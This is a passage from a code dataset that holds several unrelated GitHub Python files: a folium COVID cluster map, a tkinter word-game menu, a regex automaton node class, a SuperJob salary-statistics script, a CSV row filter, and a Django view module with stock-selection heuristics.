    Type: ' + row['type']\n }\n }\n features.append(feature)\n return features\n\n#Define colors for diffusion zones\ncolors = {'1':'#A0CF8D', '2':'#FFC04C', '3':'#B0E0E6', 'no clusters':'#cccccc'}\nzones['color']=zones['DZ'].map(colors)\n\n#Map\ndef make_map(features):\n coords_vd=[y, x]\n mstdbscan_map = folium.Map(location=coords_vd, control_scale=True, zoom_start=9,tiles='cartodbpositron')\n\n folium.GeoJson(\n zones,\n style_function = lambda x: {\"weight\":0.5,\n 'color':'#cccccc',\n 'fillColor':x['properties']['color'],\n 'fillOpacity':0.4}).add_to(mstdbscan_map)\n\n # for i in range(0, len(tests)):\n # folium.Circle(\n # location=[tests.iloc[i]['lat'], tests.iloc[i]['lon']],\n # radius=1,\n # color='#000000',\n # fill=True,\n # fillColor='#000000'\n # ).add_to(mstdbscan_map)\n\n # for i in range(0, len(cases)):\n # folium.Circle(\n # location=[cases.iloc[i]['lat'], cases.iloc[i]['lon']],\n # radius=1,\n # color='#66b266',\n # fill=True,\n # fillColor='#66b266',\n # popup=cases.iloc[i]['date_reception']\n # ).add_to(mstdbscan_map)\n\n TimestampedGeoJson(\n {'type': 'FeatureCollection',\n 'features': features}\n , period='P1D'\n , duration = 'PT23H'\n , transition_time=1000\n , add_last_point=True\n , auto_play=False\n , loop=False\n , max_speed=1\n , loop_button=True\n , time_slider_drag_update=True\n ).add_to(mstdbscan_map)\n\n #image=outdir+'legend_interactive_map.png'\n #encoded = base64.b64encode(open(image, 'rb').read())\n #ADD title\n html=\"
    \\\n
    \\\n \\\n
    \"\n mstdbscan_map.get_root().html.add_child(folium.Element(html))\n\n print('> Done.')\n return mstdbscan_map\n\nfeatures = create_geojson_features(data)\nmstdbscan_map=make_map(features)\nmstdbscan_map.save(resdir+'Supp_Mat_6.html')\n","repo_name":"aladoy/GEOCOVID-phase1","sub_path":"src/GEOCOVID-mstdbscanMap.py","file_name":"GEOCOVID-mstdbscanMap.py","file_ext":"py","file_size_in_byte":5191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10281138268","text":"from tkinter import *\n\n\ndef start_main_page():\n def start_game(args):\n main_window.destroy()\n if args == 1:\n from packages import APPS\n APPS.main()\n elif args == 2:\n from packages import PROGRAMS\n PROGRAMS.main()\n elif args == 3:\n from packages import PC\n PC.main()\n elif args == 4:\n from packages import GAMES1\n GAMES1.main()\n elif args == 5:\n from packages import OS\n OS.main()\n elif args == 6:\n from packages import ANTIVIRUS\n ANTIVIRUS.main()\n\n def option():\n\n lab_img1 = Button(\n main_window,\n text=\"Select\",\n bg='#0066ff',\n border=0,\n justify='center',\n font=(\"Arial\", 12)\n\n )\n sel_btn1 = Button(\n text=\"APPS\",\n width=20,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#ff3333\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(1),\n )\n\n sel_btn2 = Button(\n text=\"PROGRAMS\",\n width=18,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#000000\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(2),\n )\n\n sel_btn3 = Button(\n text=\"PC\",\n width=18,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#000000\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(3),\n )\n\n sel_btn4 = Button(\n text=\"GAMES1\",\n width=18,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#000000\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(4),\n )\n\n sel_btn5 = Button(\n text=\"OS\",\n width=18,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#000000\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(5),\n )\n\n sel_btn6 = Button(\n text=\"ANTIVIRUS\",\n width=18,\n borderwidth=8,\n font=(\"\", 18),\n fg=\"#000000\",\n bg=\"#99ffd6\",\n cursor=\"hand2\",\n command=lambda: start_game(6),\n )\n\n lab_img1.grid(row=0, column=0, padx=20)\n sel_btn1.grid(row=0, column=4, pady=(10, 0), padx=50, )\n sel_btn2.grid(row=1, column=4, pady=(10, 0), padx=50, )\n sel_btn3.grid(row=2, column=4, pady=(10, 0), padx=50, )\n sel_btn4.grid(row=3, column=4, pady=(10, 0), padx=50, )\n sel_btn5.grid(row=4, column=4, pady=(10, 0), padx=50, )\n sel_btn6.grid(row=5, column=4, pady=(10, 0), padx=50, )\n\n def show_option():\n start_btn.destroy()\n\n lab_img.destroy()\n option()\n\n main_window = Tk()\n\n main_window.geometry(\"500x500+500+150\")\n main_window.resizable(0, 0)\n main_window.title(\"Guess the Word\")\n main_window.configure(background=\"#0066ff\")\n \n\n img1 = PhotoImage(file=\"back.png\")\n\n lab_img = Label(\n main_window,\n text=\"Guess the Word Game\",\n bg='#0066ff',\n font=(\"Courier\", 28)\n )\n lab_img.pack(pady=(50, 0))\n\n start_btn = Button(\n main_window,\n text=\"Start\",\n width=18,\n borderwidth=8,\n fg=\"#000000\",\n bg=\"#99ffd6\",\n font=(\"\", 13),\n cursor=\"hand2\",\n command=show_option,\n )\n start_btn.pack(pady=(50, 20))\n\n main_window.mainloop()\n\n\nstart_main_page()\n","repo_name":"raghulkarthik/PROJECTS","sub_path":"projects/Guessing Word/Python game project.py","file_name":"Python game 
project.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"400211433","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport copy\nclass Noh:\n indice = None\n inicio = None\n fim = None\n peso = None\n pilhaParenteses = None\n\n def __init__(self, indice, inicio, fim, peso, pilhaParenteses):\n self.indice = indice\n self.inicio = inicio\n self.fim = fim\n self.peso = peso\n self.pilhaParenteses = copy.copy(pilhaParenteses)\n \n def getDadosNoh(self):\n saida = \"indice : \" + str(self.indice) + \" inicio : \" + str(self.inicio) + \\\n \", fim : \" + str(self.fim) + \" peso : \" + str(self.peso) + \\\n \" parenteses : \" + str(self.pilhaParenteses) + \"\\n\"\n return saida","repo_name":"k4t0mono/regex-to-code","sub_path":"ERparaAFND/Noh.py","file_name":"Noh.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34177252734","text":"import os\n\nfrom dotenv import load_dotenv\nimport requests\nfrom itertools import count\nfrom collections import defaultdict\n\nfrom predict_salary import predict_rub_salary\n\n\nLANGUAGES = [\n 'Python',\n 'Java',\n 'JavaScript',\n 'PHP',\n 'Ruby',\n 'C++',\n 'TypeScript',\n 'C#'\n]\n\n\ndef get_sj_vacancies(sj_key, language='Python', page=0):\n headers = {'X-Api-App-Id': sj_key}\n url = 'https://api.superjob.ru/2.0/vacancies/'\n params = {\n 'period': 30,\n 'catalogues': 48,\n 'town': '4',\n 'keyword': language,\n 'page': page\n }\n\n response = requests.get(url, headers=headers, params=params)\n response.raise_for_status()\n\n return response.json()\n\n\ndef collect_sj_language_statistics(language, sj_key):\n all_average_salaries = []\n found = 0\n\n for page in count(0, 1):\n decoded_response = get_sj_vacancies(sj_key, language, page=page)\n\n for salary in decoded_response['objects']:\n if salary['payment_from'] or salary['payment_to']:\n if salary['currency'] == 'rub':\n salary_rub = predict_rub_salary(\n salary['payment_from'],\n salary['payment_to']\n )\n all_average_salaries.append(salary_rub)\n\n if not decoded_response['more']:\n break\n\n found = decoded_response[\"total\"]\n\n salary_sum = int(sum(all_average_salaries) / len(all_average_salaries))\n used_count = len(all_average_salaries)\n\n statistics = {\n 'average_salary': salary_sum,\n 'vacancies_found': found,\n 'vacancies_processed': used_count\n }\n\n return statistics\n\n\ndef get_sj_language_statistics(languages):\n statistics = defaultdict()\n sj_key = os.getenv('SJ_KEY')\n\n for language in languages:\n statistics[language] = collect_sj_language_statistics(language, sj_key)\n\n return statistics\n\n\ndef main():\n load_dotenv()\n\n print(get_sj_language_statistics(LANGUAGES))\n\n\nif __name__ == '__main__':\n main()","repo_name":"CapitanDonD/job_seeker","sub_path":"sj.py","file_name":"sj.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41928377443","text":"import csv\nf = open('finalData.csv', 'r')\nff = open('final.csv', 'a+')\nf_csv = csv.reader(f)\nff_csv = csv.writer(ff)\ni = 1\n\nfor row in f_csv:\n\tif i % 8 == 7:\n\t\t#print row\n\t\tff_csv.writerow(row)\n\ti = 
i+1\n\nf.close()\nff.close()\n\n","repo_name":"XINZHEYU/New-York-MTA-Optimization-System","sub_path":"code/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"197740329","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom .models import News, KmeansData, CashFlowData, Name_Id, KStockList, CStockList, VisitData\nfrom datetime import datetime, timedelta\nfrom collections import defaultdict\nfrom django.db.models import Q\n# from .select_strategy import *\nfrom django.views.decorators.cache import cache_page\n\n# from django.db.models import Count\n\nnow = datetime.now() # 现在时刻,月日年时分秒\nnow_date = now.date() # 现在时刻,月日年\nyesterday = now + timedelta(days=-1) # 昨天\nthe_day_before_yesterday = now + timedelta(days=-2) # 前天\nday_fixed_before_news = now + timedelta(days=-30) # 10天前的消息自动从数据库中删除\nday_fixed_before_kdata = now_date + timedelta(days=-121) # 4个月前的k线图数据从数据库中删除\nday_fixed_before_cdata = now_date + timedelta(days=-121) # 4个月前的资金流数据从数据库中删除\nday_fixed_before_visit = now + timedelta(days=-5) # 5天前的访客数据从数据库中删除\n\n\n# Create your views here.\ndef index(request): # 处理主页的视图逻辑\n visitcount(request)\n return render(request, 'choose_stock/index.html', {})\n\n\ndef news(request): # 处理消息页面的视图逻辑\n visitcount(request)\n news_dated = News.objects.filter(published_time__lte=day_fixed_before_news) # 筛选出发布时间在特定天数前的过时消息\n news_dated.delete() # 删除消息\n context_dict = {} # 上下文字典\n news_today_pos = News.objects.filter(published_time__day=now.day, published_time__month=now.month,\n flag_pn=1).order_by(\n '-published_time') # 提取出今日新闻利好列表,既查询,又排序,链接过滤器好\n context_dict['news_today_pos'] = news_today_pos\n news_today_neg = News.objects.filter(published_time__day=now.day, published_time__month=now.month,\n flag_pn=0).order_by(\n '-published_time') # 提取今日利空新闻列表\n context_dict['news_today_neg'] = news_today_neg\n news_yes_pos = News.objects.filter(published_time__day=yesterday.day, published_time__month=yesterday.month,\n flag_pn=1).order_by(\n '-published_time') # 提取昨日利好新闻列表\n context_dict['news_yes_pos'] = news_yes_pos\n news_yes_neg = News.objects.filter(published_time__day=yesterday.day, published_time__month=yesterday.month,\n flag_pn=0).order_by(\n '-published_time') # 提取昨日利空新闻列表\n context_dict['news_yes_neg'] = news_yes_neg\n news_be_yes_pos = News.objects.filter(published_time__day=the_day_before_yesterday.day,\n published_time__month=the_day_before_yesterday.month, flag_pn=1).order_by(\n '-published_time') # 提取前日利好新闻列表\n context_dict['news_be_yes_pos'] = news_be_yes_pos\n news_be_yes_neg = News.objects.filter(published_time__day=the_day_before_yesterday.day,\n published_time__month=the_day_before_yesterday.month, flag_pn=0).order_by(\n '-published_time') # 提取前日利空新闻列表\n context_dict['news_be_yes_neg'] = news_be_yes_neg\n return render(request, 'choose_stock/news.html', context_dict)\n\n\ndef news_detail(request, pk): # 显示具体新闻的视图逻辑, pk指新闻存储在mysql数据库中的id(用pk做传递参数是否存在安全隐患?)\n visitcount(request)\n context_dict = {} # 需要传递进模板中的上下文参数字典\n try:\n news = News.objects.get(pk=pk)\n context_dict['news'] = news\n except News.DoesNotExist:\n pass\n return render(request, 'choose_stock/news_detail.html', context_dict)\n\n\n# --------------------------------------------------------以下为与kmeans相关的函数\ndef ChangeToEchartsData_kdata(stock_id_list=['000705', '300016', '002090']): # 将特定代码的股票数据转换为符合echarts的数据\n stocks = 
KmeansData.objects.filter(stock_id__in=stock_id_list).order_by('stock_date')\n # stocks = KmeansData.objects.filter(stock_id__in=['600612', '002060', '601988']).order_by('stock_date') # 利用老凤祥测试下\n stock_seen = list({(stock.stock_id, stock.stock_name) for stock in stocks}) # 去重用,���得不重名的stock_id\n stocks_new = [] # 添加每支重构后的股票\n for id_name in stock_seen:\n stock = {} # 重构每支股票数据\n stock['stock_id'] = id_name[0]\n stock['name'] = id_name[1]\n data = [[str(s.stock_date),\n float(s.price_open) if float(s.price_open) > 0 else float(s.price_close),\n float(s.price_close),\n float(s.price_low) if float(s.price_low) > 0 else float(s.price_close),\n float(s.price_high) if float(s.price_high) > 0 else float(s.price_close)]\n for s in stocks if s.stock_id == id_name[0]] # 目前暂时只能用此种方式(注意列表内含列表),echarts要求,画K线图的4个数据一定为浮点数\n\n # 获取涨跌幅数据,目前暂用最普通的方法\n sc = [s.price_close for s in stocks if s.stock_id == id_name[0]] # 获取所有的收盘价格\n yy = [] # 储存涨跌数据\n for x in range(len(sc) - 1):\n try:\n y = (float(sc[x + 1]) - float(sc[x])) / float(sc[x])\n yy.append('{:.2%}'.format(y))\n except Exception:\n yy.append('0.00%')\n zz = ['0.00%']\n zz.extend(yy) # 完整的涨跌幅数据\n # zz = CashFlowData.objects.filter(stock_id=id_name[0]).order_by('stock_date').values_list('var_degree', flat=True)\n for x in range(len(zz)):\n data[x].append(zz[x])\n\n stock['data'] = data\n\n # 将涨跌的volumn分开\n volumn_data = [int(s.stock_volumn) for s in stocks if s.stock_id == id_name[0]] # 获取该股票对应的成交量数据\n volumn_rise = []\n volumn_fall = []\n for x in range(len(data)):\n close_minus_open = data[x][2] - data[x][1]\n if close_minus_open > 0: # 收盘价大于开盘价,此时volumn为涨,红色\n volumn_rise.append(volumn_data[x])\n volumn_fall.append('-')\n else:\n volumn_rise.append('-')\n volumn_fall.append(volumn_data[x])\n\n stock['volumn_rise'] = volumn_rise\n stock['volumn_fall'] = volumn_fall\n\n # stock['volumn'] = [int(s.stock_volumn) for s in stocks if s.stock_id == id_name[0]]\n # k += 1\n stocks_new.append(stock)\n return stocks_new\n\n\ndef KmeansStrategy1(): # 根据策略:跌-跌-涨-涨,最后一天下影线越短越好 选择符合要求的股票\n (*_, tradeday_0, tradeday_1, tradeday_2, tradeday_3) = KmeansData.objects.filter(stock_id='601988').dates(\n 'stock_date', 'day', order='DESC')[:5] # 提取中国银行的倒数第四个交易日,作为所有股票的倒数第四个交易日,本行第一个数字为控制变量,默认且最小为4.\n\n judge_3 = KmeansData.objects.filter(stock_date=tradeday_3).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第四个交易日的股票代码,开盘价,收盘价\n stock_id_list3 = [s[0] for s in judge_3 if float(s[1]) > float(s[2])] # 倒数第四日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n # tradeday_2 = tradeday_3 + timedelta(days=1) # 倒数第3日\n judge_2 = KmeansData.objects.filter(stock_id__in=stock_id_list3, stock_date=tradeday_2).values_list('stock_id',\n 'price_open',\n 'price_close') # 获取倒数第三个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第三日绿色股票代码\n # tradeday_1 = tradeday_2 + timedelta(days=1) # 倒数第2日\n judge_1 = KmeansData.objects.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'stock_volumn') # 倒数第二个交易日股票数据, 含成交量数据\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) < float(s[2])] # 倒数第2日红色股票代码\n # tradeday_0 = tradeday_1 + timedelta(days=1) # 倒数第1日\n judge_0 = KmeansData.objects.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'stock_volumn') # 倒数第一日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 找到倒数第1日红色股票代码中,成交量较倒数第二日成交量增加的股票代码\n sid_volumn = [] # 
储存通过成交量增长判定得到的股票代码\n for s_id in stock_id_list0:\n volumn1 = [int(s[3]) for s in judge_1 if s[0] == s_id] # judge_1中的volumn\n volumn0 = [int(s[3]) for s in judge_0 if s[0] == s_id] # judge_0中的volumn\n if volumn0[0] > volumn1[0]:\n sid_volumn.append(s_id)\n\n return sid_volumn\n\n\ndef KmeansStrategy2(): # 根据策略:跌-跌-涨,要求最后一天无下影线, 且成交量最好上升\n (*_, tradeday_0, tradeday_1, tradeday_2) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :3] # 提取中国银行的倒数第三个交易日,作为所有股票的倒数第三个交易日,本行第一个数字为控制变量,默认且最小为3.\n judge_2 = KmeansData.objects.filter(stock_date=tradeday_2).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第三个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第三日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n # tradeday_1 = tradeday_2 + timedelta(days=1) # 倒数第2日----此种方法是错误的,有可能包含了周六或日\n judge_1 = KmeansData.objects.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'stock_volumn') # 倒数第2个交易日的股票代码,开盘价,收盘价\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) > float(s[2])] # 倒数第2日绿色股票代码\n # tradeday_0 = tradeday_1 + timedelta(days=1) # 倒数第1日\n judge_0 = KmeansData.objects.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'price_low',\n 'price_high',\n 'stock_volumn') # 倒数第一日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 找寻stock_id_list0中下影线特别短的股票\n sid_stock = []\n for sid in stock_id_list0:\n prices = [(float(s[1]), float(s[2]), float(s[3]), float(s[4]), int(s[5])) for s in judge_0 if\n s[0] == sid] # 获取开盘价, 收盘价,最低价,最高价\n price_open = prices[0][0]\n price_close = prices[0][1]\n price_low = prices[0][2]\n price_high = prices[0][3]\n volumn0 = prices[0][4]\n volumn1 = [int(s[3]) for s in judge_1 if s[0] == sid][0] # 倒数第二天的成交量\n try:\n if ((price_open - price_low) / price_low < 0.001) and (\n (price_close - price_open) / (\n price_high - price_low) > 0.2) and volumn0 > volumn1: # 下影线短,开收盘价与最高低价比例的判定\n sid_stock.append(sid)\n except Exception:\n continue\n\n return sid_stock\n\n\ndef KmeansStrategy2_1(index_day=3): # KmeansStrategy2的改进版,希望可以提高运行效率,核心为只调用一次数据库筛选\n (*_, tradeday_0, tradeday_1, tradeday_2) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 提取中国银行的倒数第三个交易日,作为所有股票的倒数第三个交易日,本行第一个数字为控制变量,默认且最小为3.\n stocks_2 = KmeansData.objects.filter(stock_date__range=(tradeday_2, tradeday_0)) # 获取特定三个交易日的所有股票\n judge_2 = stocks_2.filter(stock_date=tradeday_2).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第三个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第三日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n judge_1 = stocks_2.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'stock_volumn') # 倒数第2个交易日的股票代码,开盘价,收盘价\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) > float(s[2])] # 倒数第2日绿色股票代码\n judge_0 = stocks_2.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'price_low',\n 'price_high',\n 'stock_volumn') # 倒数第一日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 找寻stock_id_list0中下影线特别短,成交量上涨,圆柱实体具有一定长度的股票\n sid_stock = []\n for sid in stock_id_list0:\n prices = [(float(s[1]), float(s[2]), float(s[3]), float(s[4]), int(s[5])) for s in judge_0 if\n s[0] 
== sid] # 获取开盘价, 收盘价,最低价,最高价\n price_open = prices[0][0]\n price_close = prices[0][1]\n price_low = prices[0][2]\n price_high = prices[0][3]\n volumn0 = prices[0][4]\n volumn1 = [int(s[3]) for s in judge_1 if s[0] == sid][0] # 倒数第二天的成交量\n try:\n if ((price_open - price_low) / price_low < 0.001) and (\n (price_close - price_open) / (\n price_high - price_low) > 0.2) and volumn0 > volumn1: # 下影线短,开收盘价与最高低价比例的判定\n sid_stock.append(sid)\n except Exception:\n continue\n\n stocks_cash = CashFlowData.objects.filter(stock_id__in=sid_stock, stock_date=tradeday_0) # 最新一天的资金净流入数据\n value_cash = stocks_cash.values_list('stock_id', 'maincash_in') # 提取主力净流入数据\n value_pos_cash = [s for s in value_cash if not s[1].startswith('-')] # 提取资金流正流入的股票\n value_Pos_cash = [s for s in value_pos_cash if s[1].endswith('万') or s[1].endswith('亿')] # 去掉资金净流入还不足万元的股票\n num_Pos_cash = [(s[0], float(s[1][:-1])) if s[1].endswith('万') else (s[0], float(s[1][:-1]) * 10 ** 4) for s in\n value_Pos_cash] # 将股票的净流入数据变成浮点数\n num_sorted = sorted(num_Pos_cash, key=lambda s: s[1], reverse=True) # 按照净流入从大到小排序\n sid_stock_cash = [s[0] for s in num_sorted] # 提取股票代码\n sid_stock_cash = sid_stock_cash[:30] # 最多选取30支股票\n return sid_stock_cash\n\n\ndef KmeansStrategy3(index_day=3): # KmeansStrategy2_1的改进版,最后用主力参与度进行排序\n (*_, tradeday_0, tradeday_1, tradeday_2) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 提取中国银行的倒数第三个交易日,作为所有股票的倒数第三个交易日,本行第一个数字为控制变量,默认且最小为3.\n stocks_2 = KmeansData.objects.filter(stock_date__range=(tradeday_2, tradeday_0)) # 获取特定三个交易日的所有股票\n judge_2 = stocks_2.filter(stock_date=tradeday_2).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第三个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第三日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n judge_1 = stocks_2.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'stock_volumn') # 倒数第2个交易日的股票代码,开盘价,收盘价\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) > float(s[2])] # 倒数第2日绿色股票代码\n judge_0 = stocks_2.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close',\n 'price_low',\n 'price_high',\n 'stock_volumn') # 倒数第一日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 找寻stock_id_list0中下影线特别短,成交量上涨,圆柱实体具有一定长度的股票\n sid_stock = []\n for sid in stock_id_list0:\n prices = [(float(s[1]), float(s[2]), float(s[3]), float(s[4]), int(s[5])) for s in judge_0 if\n s[0] == sid] # 获取开盘价, 收盘价,最低价,最高价\n price_open = prices[0][0]\n price_close = prices[0][1]\n price_low = prices[0][2]\n price_high = prices[0][3]\n volumn0 = prices[0][4]\n volumn1 = [int(s[3]) for s in judge_1 if s[0] == sid][0] # 倒数第二天的成交量\n try:\n if ((price_open - price_low) / price_low < 0.001) and (\n (price_close - price_open) / (\n price_high - price_low) > 0.2) and volumn0 > volumn1: # 下影线短,开收盘价与最高低价比例的判定\n sid_stock.append(sid)\n except Exception:\n continue\n\n stocks_cash = CashFlowData.objects.filter(stock_id__in=sid_stock, stock_date=tradeday_0) # 最新一天的资金净流入数据\n value_cash = stocks_cash.values_list('stock_id', 'maincash_in') # 提取主力净流入数据\n value_pos_cash = [s for s in value_cash if not s[1].startswith('-')] # 提取资金流正流入的股票\n value_Pos_cash = [s for s in value_pos_cash if s[1].endswith('万') or s[1].endswith('亿')] # 去掉资金净流入还不足万元的股票\n num_Pos_cash = [(s[0], float(s[1][:-1])) if s[1].endswith('万') else (s[0], float(s[1][:-1]) * 10 ** 4) for s in\n 
value_Pos_cash] # 将股票的净流入数据变成浮点数\n num_sorted = sorted(num_Pos_cash, key=lambda s: s[1], reverse=True) # 按照净流入从大到小排序\n sid_stock_cash = [s[0] for s in num_sorted] # 提取股票代码\n\n # 按照主力参与程度进行排序\n cstocks = CashFlowData.objects.filter(stock_id__in=sid_stock_cash,\n stock_date__range=(tradeday_1, tradeday_0)).order_by('stock_date')\n cdatas0 = cstocks.values_list('stock_id', 'join_degree')\n cdatas1 = defaultdict(list)\n for k, v in cdatas0:\n cdatas1[k].append(float(v[:-1]))\n\n cdatas2 = [(k, cdatas1[k][1] - cdatas1[k][0]) for k in cdatas1 if\n len(cdatas1[k]) == 2 and cdatas1[k][1] - cdatas1[k][0] > 0]\n cdatas2_sort = sorted(cdatas2, key=lambda s: s[1], reverse=True)\n cdatas3 = cdatas2_sort[:20] # 呈现的股票数量\n stock_id = [s[0] for s in cdatas3]\n\n return stock_id\n\n\ndef KmeansStrategy3_1(index_day=3): # KmeansStrategy3的改进版,最后一日去掉各种繁琐的限制条件 跌/跌/涨\n (*_, tradeday_0, tradeday_1, tradeday_2) = KmeansData.objects.filter(stock_id='601988').dates('stock_date', 'day',\n order='DESC')[\n :index_day] # 提取中国银行的倒数第三个交易日,作为所有股票的倒数第三个交易日,本行第一个数字为控制变量,默认且最小为3.\n stocks_2 = KmeansData.objects.filter(stock_date__range=(tradeday_2, tradeday_0)) # 获取特定三个交易日的所有股票\n judge_2 = stocks_2.filter(stock_date=tradeday_2).values_list('stock_id', 'price_open',\n 'price_close') # 获取倒数第三个交易日的股票代码,开盘价,收盘价\n stock_id_list2 = [s[0] for s in judge_2 if float(s[1]) > float(s[2])] # 倒数第三日满足开盘价大于收盘价(绿)的股票代码,别忘了将字符串转换为浮点数\n judge_1 = stocks_2.filter(stock_id__in=stock_id_list2, stock_date=tradeday_1).values_list('stock_id',\n 'price_open',\n 'price_close') # 倒数第2个交易日的股票代码,开盘价,收盘价\n stock_id_list1 = [s[0] for s in judge_1 if float(s[1]) > float(s[2])] # 倒数第2日绿色股票代码\n judge_0 = stocks_2.filter(stock_id__in=stock_id_list1, stock_date=tradeday_0).values_list('stock_id',\n 'price_open',\n 'price_close') # 倒数第一日交易日股票数据\n stock_id_list0 = [s[0] for s in judge_0 if float(s[1]) < float(s[2])] # 倒数第1日红色股票代码\n\n # 股票当日涨跌幅小于特定值\n # var_degree = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date=tradeday_0).values_list('stock_id',\n # 'var_degree')\n # var_degree = [s for s in var_degree if s[1].endswith('%')] # 股票的涨跌幅存在\n # stock_id_list0 = [s[0] for s in var_degree if float(s[1][:-1]) < 3] # 涨跌幅小于特定数值\n\n # 最后一日主力资金净流入,并且主力成本与收盘价的差距不能过大(实测后,效果不好)\n # stocks0 = CashFlowData.objects.filter(stock_id__in=stock_id_list0, stock_date=tradeday_0)\n # judge0 = stocks0.values_list('stock_id', 'maincash_in', 'price_close', 'main_cost')\n # s0 = [s for s in judge0 if not s[1].startswith('-')] # 去掉主力净流出的股票\n # s1 = [s for s in s0 if float(s[2]) - float(s[3]) < 0.1] # 选出收盘价与主力成本的差值小于0.1的股票\n # stock_id_list0 = [s[0] for s in s1] # 提取股票代码\n\n # 按照主力参与程度进行排序\n cstocks = CashFlowData.objects.filter(stock_id__in=stock_id_list0,\n stock_date__range=(tradeday_1, tradeday_0)).order_by('stock_date')\n cdatas0 = cstocks.values_list('stock_id', 'join_degree')\n cdatas1 = defaultdict(list)\n for k, v in cdatas0:\n cdatas1[k].append(float(v[:-1]))\n\n cdatas2 = [(k, cdatas1[k][1] - cdatas1[k][0]) for k in cdatas1 if\n len(cdatas1[k]) == 2 and cdatas1[k][1] - cdatas1[k][0] > 2] # 主力参与度(今日-昨日)>2%\n cdatas2_sort = sorted(cdatas2, key=lambda s: s[1], reverse=True)\n cdatas3 = cdatas2_sort[:10] # 呈现的股票数量\n stock_id = [s[0] for s in cdatas3]\n\n return stock_id\n\n\ndef reverse_kmeans(index_day=4): # 直接观察跌/跌/涨之后,最后一天大涨的股票规律\n (*_, tradeday_0, tradeday_1, tradeday_2, tradeday_3) = KmeansData.objects.filter(stock_id='601988').dates(\n 'stock_date', 'day', order='DESC')[:index_day] # 本行第一个数字为控制变量,默认且最小为4.\n stocks = 
